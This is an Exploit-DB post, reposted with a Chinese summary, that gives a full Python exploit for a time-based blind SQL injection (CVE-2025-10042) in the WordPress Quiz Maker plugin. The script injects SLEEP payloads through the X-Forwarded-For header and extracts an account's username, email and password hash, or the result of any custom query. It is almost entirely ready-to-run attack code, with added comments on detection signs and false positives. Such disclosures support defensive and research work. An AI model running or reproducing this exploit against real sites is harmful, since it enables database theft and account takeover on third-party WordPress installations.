[webapps] WordPress Quiz Maker 6.7.0.56 - SQL Injection
该文章揭示了WordPress Quiz Maker插件版本6.7.0.56及以下存在的SQL注入漏洞(CVE-2025-10042),允许攻击者通过特定HTTP头注入恶意SQL代码,窃取敏感数据如管理员用户名、密码哈希和电子邮件地址。 2025-12-25 00:0:0 Author: www.exploit-db.com(查看原文)

# Exploit Title: WordPress Quiz Maker 6.7.0.56 - SQL Injection
# Date: 2025-12-16
# Exploit Author: Rahul Sreenivasan (Tr0j4n)
# Vendor Homepage: https://ays-pro.com/wordpress/quiz-maker
# Software Link: https://wordpress.org/plugins/quiz-maker/
# Version: <= 6.7.0.56
# Tested on: WordPress 6.x with Quiz Maker 6.7.0.56 on Ubuntu/Nginx/PHP-FPM
# CVE: CVE-2025-10042

from argparse import ArgumentParser
from requests import get
from requests.packages.urllib3 import disable_warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from time import time
from sys import exit

# Silence urllib3's InsecureRequestWarning: every request in this file is sent
# with verify=False, so TLS certificate validation is disabled for the whole run.
disable_warnings(InsecureRequestWarning)

# Candidate characters for extraction. NOTE(review): nothing in this file
# references CHARSET; extract_char() searches the ASCII range 32..126 instead.
CHARSET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-@.!$/:?"

def send_payload(url: str, path: str, header: str, payload: str, timeout: float) -> float:
    """Send one GET request carrying ``payload`` in the request header named ``header``.

    The only thing returned is how long the request took; the response body
    and status code are never inspected. Timing is therefore the sole signal
    every other function in this file works from.

    Args:
        url: Base site URL; a trailing slash is stripped before joining.
        path: Path appended to ``url``; a leading slash is stripped.
        header: Name of the request header that carries ``payload``.
        payload: Value placed verbatim in that header.
        timeout: Per-request timeout handed to ``requests.get``.

    Returns:
        Elapsed wall-clock seconds, or ``timeout`` if the request raised.
    """
    target = f"{url.rstrip('/')}/{path.lstrip('/')}"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        header: payload
    }
    try:
        start = time()
        # verify=False: certificate errors are ignored (the warning is silenced
        # at module level), so the run also proceeds against hosts with bad TLS.
        get(target, headers=headers, timeout=timeout, verify=False)
        return time() - start
    except:
        # Bare except also swallows KeyboardInterrupt and SystemExit. Any
        # failure (timeout, DNS/connection error, TLS error) is reported as a
        # full ``timeout`` seconds, which callers cannot distinguish from a
        # genuinely slow response.
        return timeout

def check_vulnerable(url: str, path: str, header: str, sleep_time: int, timeout: float) -> bool:
    """Time-based probe: one benign header value, then one ``SLEEP`` payload.

    Detection note: the probe value is the literal ``1' OR SLEEP(<n>)#`` placed
    in the header named ``header`` (``X-Forwarded-For`` by default in ``main``).
    A single quote followed by ``SLEEP(`` inside that header is what a WAF rule
    or request-header logging would see for this check.

    Args:
        url, path, header, timeout: Forwarded to ``send_payload``.
        sleep_time: Seconds the injected ``SLEEP`` asks the database to pause.

    Returns:
        True when the injected request took at least 70% of ``sleep_time``.
    """
    print("[*] Testing for SQL injection vulnerability...")
    
    # The baseline is printed for the operator only; the verdict below does
    # not subtract or otherwise use it.
    baseline = send_payload(url, path, header, "127.0.0.1", timeout)
    print(f"[*] Baseline response time: {baseline:.2f}s")
    
    payload = f"1' OR SLEEP({sleep_time})#"
    injection = send_payload(url, path, header, payload, timeout)
    print(f"[*] Injection response time: {injection:.2f}s")
    
    # Threshold is absolute (relative to sleep_time only). Because
    # send_payload returns ``timeout`` on any error, an unreachable host with
    # timeout >= 0.7 * sleep_time is also reported as vulnerable -- a false
    # positive worth remembering when triaging this tool's output.
    if injection >= sleep_time * 0.7:
        print("[+] Target is VULNERABLE!")
        return True
    else:
        print("[-] Target does not appear to be vulnerable.")
        return False

def extract_length(url: str, path: str, header: str, query: str, timeout: float) -> int:
    """Binary-search the length of ``query``'s scalar result using 1-second delays.

    Searches 1..100 with ``LENGTH((query)) > mid`` conditions; a response of
    at least 0.8 s counts as "true". Because ``high`` starts at 100 and never
    rises, any result longer than 100 characters is reported as 100. Each
    probe is one request, so roughly log2(100) (about 7) requests are sent
    in quick succession -- a burst pattern visible in request logs.

    Args:
        query: SQL subquery whose single-value result length is measured.
        url, path, header, timeout: Forwarded to ``send_payload``.

    Returns:
        The inferred length, in the range 1..100.
    """
    low, high = 1, 100
    
    while low < high:
        mid = (low + high) // 2
        payload = f"1' OR IF(LENGTH(({query}))>{mid},SLEEP(1),0)#"
        elapsed = send_payload(url, path, header, payload, timeout)
        
        # No baseline subtraction: a naturally slow (>= 0.8 s) response, or an
        # error (send_payload returns ``timeout``), is also read as "true".
        if elapsed >= 0.8:
            low = mid + 1
        else:
            high = mid
    
    return low

def extract_char(url: str, path: str, header: str, query: str, position: int, timeout: float) -> str:
    """Binary-search the ASCII code of one character of ``query``'s result.

    Searches printable ASCII 32..126 with
    ``ASCII(SUBSTRING((query), position, 1)) > mid`` conditions, using the
    same 1-second delay / 0.8 s threshold as ``extract_length``. About 7
    requests are sent per character.

    Args:
        query: SQL subquery whose single-value result is being read.
        position: 1-based character index within that result.
        url, path, header, timeout: Forwarded to ``send_payload``.

    Returns:
        The inferred character as a one-character string.
    """
    low, high = 32, 126
    
    while low < high:
        mid = (low + high) // 2
        payload = f"1' OR IF(ASCII(SUBSTRING(({query}),{position},1))>{mid},SLEEP(1),0)#"
        elapsed = send_payload(url, path, header, payload, timeout)
        
        if elapsed >= 0.8:
            low = mid + 1
        else:
            high = mid
    
    # ``low`` can never exceed ``high`` (126), so the "?" fallback is
    # unreachable; chr(low) is always returned. Characters outside 32..126
    # (e.g. non-ASCII) are misreported as whichever boundary the search hit.
    return chr(low) if low <= 126 else "?"

def extract_data(url: str, path: str, header: str, query: str, timeout: float) -> str:
    """Read the scalar result of ``query`` one character at a time.

    Calls ``extract_length`` once and then ``extract_char`` for every
    position 1..length, printing a progress line as characters arrive.
    Combined with the per-call request counts, a full extraction is on the
    order of 7 + 7 * length requests, each carrying a ``SLEEP(1)`` payload.

    Args:
        query: SQL subquery expected to yield a single value.
        url, path, header, timeout: Forwarded to the helpers.

    Returns:
        The reconstructed string (at most 100 characters, see ``extract_length``).
    """
    length = extract_length(url, path, header, query, timeout)
    print(f"[*] Data length: {length}")
    
    result = ""
    for i in range(1, length + 1):
        char = extract_char(url, path, header, query, i, timeout)
        result += char
        # Carriage return redraws the same terminal line with the partial result.
        print(f"\r[*] Extracting: {result}", end="", flush=True)
    
    print()
    return result

def dump_users(url: str, path: str, header: str, timeout: float) -> tuple[str, str, str]:
    """Extract login, e-mail and password hash for the user with ``ID=1``.

    The table name ``wp_users`` is hard-coded, so this assumes the default
    ``wp_`` table prefix. ``ID=1`` is presumably the first-created account;
    the code does not verify that it is an administrator.

    Args:
        url, path, header, timeout: Forwarded to ``extract_data``.

    Returns:
        ``(username, email, password_hash)`` as extracted.
    """
    print("\n[*] Extracting WordPress admin users...")
    
    # Get admin user login
    query = "SELECT user_login FROM wp_users WHERE ID=1"
    username = extract_data(url, path, header, query, timeout)
    print(f"[+] Username: {username}")
    
    # Get admin email
    query = "SELECT user_email FROM wp_users WHERE ID=1"
    email = extract_data(url, path, header, query, timeout)
    print(f"[+] Email: {email}")
    
    # Get password hash
    query = "SELECT user_pass FROM wp_users WHERE ID=1"
    password = extract_data(url, path, header, query, timeout)
    print(f"[+] Password Hash: {password}")
    
    return username, email, password

def main() -> None:
    """Parse arguments, run the timing probe, then dump users or run a custom query.

    Flow: ``check_vulnerable`` always runs first (3-second ``SLEEP``); a
    negative verdict exits with status 1. ``--check`` stops after the probe.
    ``--dump`` and the no-flag default both call ``dump_users``; ``--query``
    extracts an arbitrary scalar subquery instead.
    """
    parser = ArgumentParser(description="WordPress Quiz Maker SQLi Exploit (CVE-2025-10042)")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress URL")
    parser.add_argument("-p", "--path", required=True, help="Path to quiz page")
    # The injection header defaults to X-Forwarded-For; every payload in this
    # file is sent as this header's value.
    parser.add_argument("-H", "--header", default="X-Forwarded-For", help="Header for injection")
    parser.add_argument("-t", "--timeout", type=int, default=10, help="Request timeout")
    parser.add_argument("--check", action="store_true", help="Only check vulnerability")
    parser.add_argument("--dump", action="store_true", help="Dump admin credentials")
    parser.add_argument("--query", help="Custom SQL query to extract")
    args = parser.parse_args()
    
    print("[+] WordPress Quiz Maker SQLi Exploit (CVE-2025-10042)")
    print(f"[+] Target: {args.url}")
    
    # sleep_time=3 with the default timeout=10: an errored request (reported
    # as 10 s by send_payload) clears the 2.1 s threshold, so unreachable
    # hosts pass this gate.
    if not check_vulnerable(args.url, args.path, args.header, 3, args.timeout):
        exit(1)
    
    if args.check:
        exit(0)
    
    if args.dump:
        dump_users(args.url, args.path, args.header, args.timeout)
    elif args.query:
        print(f"\n[*] Executing custom query: {args.query}")
        result = extract_data(args.url, args.path, args.header, args.query, args.timeout)
        print(f"[+] Result: {result}")
    else:
        # No mode flag given: same behaviour as --dump.
        dump_users(args.url, args.path, args.header, args.timeout)

# Script entry point; importing the module runs nothing beyond the
# module-level disable_warnings() call.
if __name__ == "__main__":
    main()
            

文章来源: https://www.exploit-db.com/exploits/52465